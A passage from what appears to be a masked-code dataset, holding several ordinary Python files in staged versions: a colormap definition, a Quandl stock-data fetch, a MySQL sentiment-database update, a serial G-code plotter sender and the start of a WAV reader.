0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655,
0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132,
0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [
0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823,
0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282,
0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [
0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855,
0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
test_cm = romaO_map
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| #
# romaO
# www.fabiocrameri.ch/colourmaps
from matplotlib.colors import LinearSegmentedColormap
cm_data = [[0.45137, 0.22346, 0.34187],
[0.45418, 0.22244, 0.3361],
[0.45696, 0.22158, 0.33043],
[0.45975, 0.2209, 0.32483],
[0.46251, 0.22035, 0.31935],
[0.46527, 0.21994, 0.31394],
[0.46803, 0.21968, 0.30862],
[0.47078, 0.21958, 0.30337],
[0.47352, 0.21962, 0.29822],
[0.47628, 0.21982, 0.29316],
[0.47902, 0.22017, 0.28818],
[0.48178, 0.22067, 0.2833],
[0.48453, 0.2213, 0.2785],
[0.48731, 0.22208, 0.27379],
[0.49008, 0.22304, 0.26917],
[0.49286, 0.22411, 0.26461],
[0.49567, 0.22536, 0.26016],
[0.4985, 0.22677, 0.25579],
[0.50134, 0.22833, 0.25153],
[0.50419, 0.22999, 0.24733],
[0.50707, 0.23188, 0.24322],
[0.50997, 0.23387, 0.23923],
[0.5129, 0.23605, 0.23533],
[0.51584, 0.23835, 0.23151],
[0.51884, 0.24082, 0.22779],
[0.52184, 0.24345, 0.22414],
[0.52489, 0.24625, 0.22065],
[0.52797, 0.2492, 0.2172],
[0.53108, 0.25231, 0.21387],
[0.53423, 0.25556, 0.21064],
[0.53742, 0.25899, 0.20753],
[0.54063, 0.26255, 0.20452],
[0.54389, 0.26628, 0.20158],
[0.54718, 0.27017, 0.19879],
[0.55051, 0.27419, 0.19613],
[0.55389, 0.27839, 0.19356],
[0.55731, 0.28273, 0.19109],
[0.56075, 0.2872, 0.18877],
[0.56424, 0.29186, 0.18655],
[0.56777, 0.29665, 0.18446],
[0.57134, 0.30157, 0.18248],
[0.57495, 0.30666, 0.18065],
[0.5786, 0.31186, 0.17898],
[0.58228, 0.31724, 0.17743],
[0.58602, 0.32275, 0.17597],
[0.58977, 0.32838, 0.17473],
[0.59358, 0.33415, 0.17358],
[0.59742, 0.34005, 0.17261],
[0.60129, 0.34606, 0.17179],
[0.60519, 0.35223, 0.17114],
[0.60915, 0.35851, 0.17065],
[0.61311, 0.36491, 0.17034],
[0.61713, 0.37143, 0.1702],
[0.62118, 0.37808, 0.17023],
[0.62526, 0.38483, 0.17046],
[0.62937, 0.39171, 0.17087],
[0.63352, 0.39869, 0.17148],
[0.63769, 0.40579, 0.17229],
[0.6419, 0.41299, 0.17332],
[0.64613, 0.42029, 0.17458],
[0.65041, 0.42771, 0.176],
[0.6547, 0.43522, 0.17774],
[0.65904, 0.44283, 0.17962],
[0.66341, 0.45054, 0.18175],
[0.6678, 0.45834, 0.18416],
[0.67222, 0.46625, 0.1868],
[0.67667, 0.47425, 0.18968],
[0.68114, 0.48233, 0.19283],
[0.68566, 0.49051, 0.19624],
[0.69019, 0.49878, 0.19987],
[0.69474, 0.50712, 0.20384],
[0.69933, 0.51554, 0.20803],
[0.70394, 0.52406, 0.21251],
[0.70858, 0.53265, 0.21726],
[0.71322, 0.5413, 0.22229],
[0.7179, 0.55003, 0.22761],
[0.72257, 0.55881, 0.23318],
[0.72727, 0.56767, 0.23907],
[0.73197, 0.57658, 0.24521],
[0.73666, 0.58553, 0.25168],
[0.74136, 0.59451, 0.25837],
[0.74605, 0.60354, 0.26537],
[0.75073, 0.61259, 0.27263],
[0.75538, 0.62166, 0.28017],
[0.76001, 0.63075, 0.28796],
[0.7646, 0.63982, 0.29602],
[0.76914, 0.64889, 0.30433],
[0.77363, 0.65793, 0.31287],
[0.77806, 0.66694, 0.32165],
[0.78242, 0.6759, 0.33066],
[0.78669, 0.68481, 0.33988],
[0.79087, 0.69365, 0.34929],
[0.79494, 0.7024, 0.35888],
[0.7989, 0.71106, 0.36867],
[0.80273, 0.71961, 0.37859],
[0.80642, 0.72803, 0.38866],
[0.80996, 0.73631, 0.39885],
[0.81334, 0.74446, 0.40916],
[0.81655, 0.75244, 0.41957],
[0.81956, 0.76025, 0.43004],
[0.82239, 0.76787, 0.44057],
[0.82501, 0.7753, 0.45115],
[0.82742, 0.78252, 0.46174],
[0.8296, 0.78953, 0.47235],
[0.83155, 0.79631, 0.48293],
[0.83326, 0.80287, 0.49349],
[0.83472, 0.80919, 0.50402],
[0.83592, 0.81526, 0.51449],
[0.83686, 0.82109, 0.52487],
[0.83753, 0.82666, 0.53517],
[0.83793, 0.83198, 0.54537],
[0.83805, 0.83703, 0.55546],
[0.83788, 0.84182, 0.56542],
[0.83744, 0.84635, 0.57525],
[0.8367, 0.85061, 0.58493],
[0.83567, 0.85462, 0.59446],
[0.83435, 0.85835, 0.60382],
[0.83274, 0.86183, 0.61301],
[0.83084, 0.86504, 0.62202],
[0.82864, 0.868, 0.63085],
[0.82615, 0.87068, 0.63949],
[0.82337, 0.87312, 0.64792],
[0.8203, 0.87531, 0.65617],
[0.81695, 0.87724, 0.6642],
[0.81331, 0.87892, 0.67203],
[0.80939, 0.88036, 0.67964],
[0.80518, 0.88156, 0.68705],
[0.80071, 0.8825, 0.69424],
[0.79595, 0.88322, 0.70121],
[0.79094, 0.8837, 0.70797],
[0.78566, 0.88395, 0.7145],
[0.78012, 0.88396, 0.72082],
[0.77433, 0.88375, 0.72692],
[0.7683, 0.88331, 0.73279],
[0.76203, 0.88264, 0.73844],
[0.75553, 0.88177, 0.74387],
[0.74879, 0.88066, 0.74908],
[0.74184, 0.87934, 0.75407],
[0.73468, 0.87781, 0.75884],
[0.72731, 0.87607, 0.76339],
[0.71976, 0.87411, 0.76772],
[0.71201, 0.87195, 0.77184],
[0.70408, 0.86958, 0.77573],
[0.69599, 0.86701, 0.77941],
[0.68774, 0.86425, 0.78288],
[0.67934, 0.86127, 0.78614],
[0.67081, 0.85811, 0.78919],
[0.66215, 0.85476, 0.79202],
[0.65336, 0.8512, 0.79465],
[0.64448, 0.84747, 0.79707],
[0.6355, 0.84356, 0.7993],
[0.62645, 0.83947, 0.80131],
[0.61732, 0.83519, 0.80313],
[0.60814, 0.83075, 0.80476],
[0.59891, 0.82614, 0.80619],
[0.58965, 0.82137, 0.80743],
[0.58037, 0.81644, 0.80848],
[0.57108, 0.81135, 0.80935],
[0.56181, 0.80612, 0.81004],
[0.55255, 0.80074, 0.81055],
[0.54332, 0.79522, 0.81088],
[0.53412, 0.78958, 0.81105],
[0.525, 0.7838, 0.81105],
[0.51593, 0.77791, 0.81088],
[0.50695, 0.77189, 0.81055],
[0.49808, 0.76577, 0.81007],
[0.48928, 0.75954, 0.80944],
[0.48061, 0.75321, 0.80866],
[0.47207, 0.7468, 0.80773],
[0.46365, 0.74029, 0.80667],
[0.45539, 0.7337, 0.80546],
[0.44728, 0.72703, 0.80413],
[0.43934, 0.7203, 0.80266],
[0.43158, 0.7135, 0.80107],
[0.42398, 0.70664, 0.79936],
[0.41658, 0.69971, 0.79752],
[0.40938, 0.69275, 0.79557],
[0.40237, 0.68572, 0.79351],
[0.3956, 0.67865, 0.79133],
[0.38903, 0.67155, 0.78905],
[0.38267, 0.66441, 0.78666],
[0.37656, 0.65724, 0.78416],
[0.37066, 0.65003, 0.78155],
[0.36502, 0.64279, 0.77884],
[0.35961, 0.63552, 0.77604],
[0.35446, 0.62824, 0.77312],
[0.34955, 0.62094, 0.77011],
[0.3449, 0.6136, 0.767],
[0.34051, 0.60625, 0.76378],
[0.33637, 0.59889, 0.76047],
[0.33253, 0.59151, 0.75704],
[0.32893, 0.58412, 0.75351],
[0.32559, 0.57671, 0.74987],
[0.32256, 0.56928, 0.74613],
[0.31978, 0.56186, 0.74228],
[0.31727, 0.55441, 0.7383],
[0.31505, 0.54695, 0.73422],
[0.31311, 0.53948, 0.73002],
[0.31144, 0.53201, 0.72569],
[0.31007, 0.52453, 0.72124],
[0.30897, 0.51704, 0.71667],
[0.30811, 0.50955, 0.71197],
[0.30755, 0.50205, 0.70713],
[0.30726, 0.49456, 0.70216],
[0.30723, 0.48707, 0.69706],
[0.30746, 0.47958, 0.69182],
[0.30795, 0.4721, 0.68643],
[0.3087, 0.46463, 0.6809],
[0.30968, 0.45716, 0.67525],
[0.31088, 0.44973, 0.66944],
[0.31228, 0.44232, 0.6635],
[0.31393, 0.43493, 0.65741],
[0.31578, 0.42758, 0.65118],
[0.3178, 0.42025, 0.64482],
[0.32001, 0.41299, 0.63833],
[0.32238, 0.40577, 0.6317],
[0.32489, 0.39861, 0.62495],
[0.32755, 0.39152, 0.61809],
[0.33035, 0.38448, 0.61111],
[0.33327, 0.37755, 0.60402],
[0.33627, 0.37068, 0.59684],
[0.33939, 0.36392, 0.58955],
[0.34257, 0.35728, 0.58219],
[0.3458, 0.35073, 0.57476],
[0.34912, 0.34428, 0.56727],
[0.35247, 0.33797, 0.55971],
[0.35587, 0.33179, 0.55212],
[0.35927, 0.32574, 0.54448],
[0.36271, 0.31986, 0.53684],
[0.36617, 0.31411, 0.52917],
[0.36961, 0.30852, 0.52148],
[0.37306, 0.30306, 0.51382],
[0.37652, 0.2978, 0.50615],
[0.37994, 0.29269, 0.49854],
[0.38336, 0.28775, 0.49094],
[0.38674, 0.28301, 0.48337],
[0.39011, 0.27842, 0.47586],
[0.39346, 0.27401, 0.4684],
[0.39677, 0.26978, 0.461],
[0.40006, 0.26573, 0.45366],
[0.40333, 0.26185, 0.4464],
[0.40655, 0.25815, 0.43921],
[0.40974, 0.25466, 0.43212],
[0.4129, 0.25132, 0.42509],
[0.41602, 0.24817, 0.41813],
[0.41912, 0.24515, 0.41128],
[0.42218, 0.24235, 0.40451],
[0.42522, 0.23972, 0.39784],
[0.42823, 0.23728, 0.39126],
[0.43121, 0.23498, 0.38475],
[0.43415, 0.23282, 0.37836],
[0.43708, 0.23086, 0.37204],
[0.43998, 0.22907, 0.36583],
[0.44286, 0.22743, 0.3597],
[0.44571, 0.22596, 0.35366],
[0.44855, 0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
# Exposed as test_cm so the colormap can be inspected with "viscm view"
test_cm = romaO_map
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print("viscm not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=romaO_map)
plt.show()
| [
0,
1,
2,
3,
4
] |
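A minimal usage sketch for a colormap built this way: LinearSegmentedColormap.from_list interpolates between RGB stops, so any slice of the cm_data table above works as input (matplotlib is assumed to be installed; the two stops below are rows taken from that table).
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap
# Two RGB stops copied from the cm_data table above
cm = LinearSegmentedColormap.from_list('romaO_mini', [[0.6678, 0.45834, 0.18416],
                                                      [0.44855, 0.2246, 0.34773]])
plt.imshow(np.random.rand(16, 16), cmap=cm)  # apply the colormap to 2-D data
plt.colorbar()
plt.show()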
46 | 3dd4b4d4241e588cf44230891f496bafb30c6153 | <mask token>
| <mask token>
print(df.head())
| <mask token>
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
| import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
|
import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
#print(list(data))
| [
0,
1,
2,
3,
4
] |
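The row above reads the CSV straight from the URL; a sketch of an equivalent fetch with an explicit HTTP call follows, for cases where a timeout or custom headers are needed (same Quandl endpoint; requests and pandas assumed available).
import io
import requests
import pandas as pd
resp = requests.get('https://www.quandl.com/api/v3/datasets/WIKI/ADS.csv', timeout=10)
resp.raise_for_status()                      # surface HTTP errors early
df = pd.read_csv(io.StringIO(resp.text)).head(100)
print(df.head())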
47 | a558b42106b036719fe38ee6efd1c5b933290f52 | <mask token>
| <mask token>
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| <mask token>
connection, Twitter_Sentiment_Analysis = func.Database_Acces(
'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',
'Twitter_Sentiment_Analysis4')
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| from sqlalchemy import select, update
from sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger
from sqlalchemy import create_engine, MetaData
import API_and_Database_function as func
import pandas as pd
import re
connection, Twitter_Sentiment_Analysis = func.Database_Acces(
'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',
'Twitter_Sentiment_Analysis4')
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection,
'Export_csv5.csv')
| #!/usr/local/bin/python
# -*- coding: utf-8 -*-
from sqlalchemy import select, update
from sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger
from sqlalchemy import create_engine, MetaData
import API_and_Database_function as func
import pandas as pd
import re
connection, Twitter_Sentiment_Analysis = func.Database_Acces("mysql://root@localhost/sentiment?charset=utf8mb4", 'utf8' , 'Twitter_Sentiment_Analysis4' )
stmt = "SET NAMES 'UTF8';"
connection.execute(stmt)
func.update_annotations_db(Twitter_Sentiment_Analysis, connection, "Export_csv5.csv") | [
0,
1,
2,
3,
4
] |
48 | 10d35ba3c04d9cd09e152c575e74b0382ff60572 | <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
<mask token>
<mask token>
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
<mask token>
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
<mask token>
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
<mask token>
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
self._send_line(command)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
<mask token>
| <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
<mask token>
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
    def _send_line(self, line):
        self.last_line = line  # keep the raw line so a resend request can replay it
        command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
                self._send_line(self.last_line)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| <mask token>
class GcodeSender(object):
<mask token>
<mask token>
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x, y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
    def _send_line(self, line):
        self.last_line = line  # keep the raw line so a resend request can replay it
        command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
                self._send_line(self.last_line)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| <mask token>
PORT = '/dev/ttys005'
SPEED = 4800.0
class GcodeSender(object):
PEN_LIFT_PULSE = 1500
PEN_DROP_PULSE = 800
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=
dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',
sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=
dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x, y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)
)
self.command_queue.put_nowait('G4 S1')
def on_pen_lift(self):
self.command_queue.put_nowait('M400')
self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)
)
self.command_queue.put_nowait('G4 P500')
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if self.plotter:
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
    def _send_line(self, line):
        self.last_line = line  # keep the raw line so a resend request can replay it
        command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print('READ: {}'.format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number - 1
while not response.startswith('ok'):
if response.startswith((f'rs {previous_line_number}',
f'Resend:{previous_line_number}')):
print('resend request: {}'.format(response))
self.line_number = self.line_number - 1
                self._send_line(self.last_line)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception(
'requested resend of some other line number: {}'.format
(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| from pydispatch import dispatcher
import time
import serial
import threading
from queue import Queue
PORT='/dev/ttys005'
#PORT='/dev/tty.usbmodem1461'
SPEED=4800.0
class GcodeSender(object):
PEN_LIFT_PULSE = 1500
PEN_DROP_PULSE = 800
def __init__(self, **kwargs):
super(GcodeSender, self).__init__(**kwargs)
self._stop = threading.Event()
self.parsing_thread = None
self.command_queue = Queue()
self.line_number = 1
self.plotter = None
dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any)
dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any)
dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any)
def on_move_to_point(self, x, y):
print('X{0:.3f} Y{1:.3f}'.format(x,y))
command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x,y,SPEED)
self.command_queue.put_nowait(command)
def on_pen_drop(self):
#print("pen drop")
self.command_queue.put_nowait("M400")
self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_DROP_PULSE))
self.command_queue.put_nowait("G4 S1")
def on_pen_lift(self):
#print("pen lift")
self.command_queue.put_nowait("M400")
self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_LIFT_PULSE))
self.command_queue.put_nowait("G4 P500")
def start(self):
self._stop.clear()
self.parsing_thread = threading.Thread(target=self.start_processing)
self.parsing_thread.daemon = True
self.parsing_thread.start()
def stop(self):
if(self.plotter):
self.plotter.close()
self.plotter = None
def __del__(self):
self.stop_thread()
self.stop()
def start_processing(self):
self.command_queue.put_nowait('M110 N2')
self.command_queue.put_nowait('G90')
self.command_queue.put_nowait('G28')
self.plotter = serial.Serial(PORT, 115200, timeout=1)
self._read_and_process_and_wait_for_ok(break_on_timeout=True)
while True:
while not self.command_queue.empty():
command = self.command_queue.get_nowait()
self.command_queue.task_done()
self._send_line(command)
self._read_and_process_and_wait_for_ok()
time.sleep(0.5)
    def _send_line(self, line):
        self.last_line = line  # keep the raw line so a resend request can replay it
        command = 'N{} {} '.format(self.line_number, line)
command = '{}*{}\n'.format(command, self._checksum(command))
#print("SEND: {}".format(command))
self.line_number += 1
self.plotter.write(command.encode('utf-8'))
def _read_line(self):
response = self.plotter.readline()
print("READ: {}".format(response))
return response.decode('utf-8')
def _checksum(self, command):
checksum = 0
for char in command:
byte_char = char.encode('utf-8')
int_char = int.from_bytes(byte_char, 'big')
checksum = checksum ^ int_char
return checksum
def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):
response = self._read_line()
if not response.strip() and break_on_timeout:
return
previous_line_number = self.line_number-1
while not response.startswith('ok'):
if response.startswith((f"rs {previous_line_number}", f"Resend:{previous_line_number}")):
print('resend request: {}'.format(response))
self.line_number = self.line_number-1
                self._send_line(self.last_line)
response = self._read_line()
elif response.startswith(('rs', 'Resend')):
raise Exception('requested resend of some other line number: {}'.format(response))
elif response.startswith('!!'):
raise Exception('printer fault')
elif response.startswith('//'):
print('comment: {}'.format(response))
response = self._read_line()
elif response.startswith('wait'):
response = self._read_line()
time.sleep(0.5)
elif response.startswith('start'):
return
else:
print('unknown response: {}'.format(response))
response = self._read_line()
#raise Exception('unknown response: {}'.format(response))
def stop_thread(self):
self._stop.set()
self.parsing_thread = None
| [
8,
13,
14,
16,
18
] |
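A standalone sketch of the Marlin-style framing that _send_line and _checksum above implement: an XOR over the bytes of 'N<line> <gcode> ' is appended after '*'; ord() is used here, which is equivalent to the int.from_bytes call above for single ASCII characters.
def frame(line_number, gcode):
    body = 'N{} {} '.format(line_number, gcode)
    checksum = 0
    for ch in body:
        checksum ^= ord(ch)          # XOR of all byte values
    return '{}*{}\n'.format(body, checksum)
print(frame(1, 'G28'))               # -> 'N1 G28 *50\n'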
49 | c105f06e302740e9b7be100df905852bb5610a2c | import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
import struct
import wave
scale = 0.01
wav = wave.open('output.wav', 'r')
print('channels %d' % wav.getnchannels())
print('smpl width %d' % wav.getsampwidth())
print('frame rate %f' % wav.getframerate())
nframes = wav.getnframes()
print('frames %d' % nframes)
data = wav.readframes(nframes)
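# '<%dh' assumes 16-bit samples from a single channel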
